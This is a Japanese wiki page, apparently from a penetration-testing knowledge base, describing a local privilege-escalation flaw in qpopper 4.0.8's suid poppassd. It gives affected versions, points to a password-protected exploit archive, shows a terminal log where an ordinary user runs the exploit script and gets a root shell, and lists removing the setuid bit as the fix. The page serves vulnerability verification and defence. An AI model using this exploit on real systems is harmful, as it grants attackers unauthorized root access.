[[exploit:local:unix:qpopper-poppassd]]
 
トレース: » 玄箱の初期化 » MS06-040:Server サービスの脆弱性により、リモートでコードが実行される » Pantera » AWStats 5.7 - 6.2 Multiple Remote Exploit » Apache 2.2.x インストール » qpopper <= 4.0.8 poppassd localroot exploit
目次

qpopper <= 4.0.8 poppassd localroot exploit

更新履歴

  • 2006/02/16 初版

概要

  • qpopper 4.0.8以前のpoppassd(パスワード変更デーモン)に脆弱性
  • -tオプションで指定するデバッグ用のトレースファイルの作成パーミッションに問題があり、またpoppassdがsuidでroot権限で実行されるようになっているため、ローカルユーザによる権限昇格が実行できてしまう
  • なお、poppassd はコンパイル時に –enable-poppassd をつけていないとインストールされない
  • 2005/09/26 公開

影響を受けるシステム

  • qpopper 4.0.8 以前のバージョン(4.0.8含む)を使用し、poppassdが有効になっているシステム

影響を受けないシステム

  • poppassdを有効にしていないシステム

添付ファイル

files password
poppassd.zip pen-test

参考URL

Exploitの検証

検証環境

  • CentOS 4.0
  • qpopper 4.0.8 (poppassd有効)

検証結果

  • 一般ユーザでログイン後、以下を実行する。
$ netstat -an |grep 110
tcp        0      0 0.0.0.0:110                 0.0.0.0:*                   LISTEN      
$
$ whoami
kikuzou
$
$ ./poppassd.sh 

Linux Qpopper poppassd latest version local r00t exploit by kcope

--- Now type ENTER ---

200 centos02 poppassd v4.0.8 hello, who are you?

500 Username required. [Enterキー]
IT'S A ROOTSHELL!!!
sh-3.00# whoami
root
sh-3.00#

対処方法

  1. poppassd コマンドから setuid ビットを削除
 
exploit/local/unix/qpopper-poppassd.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS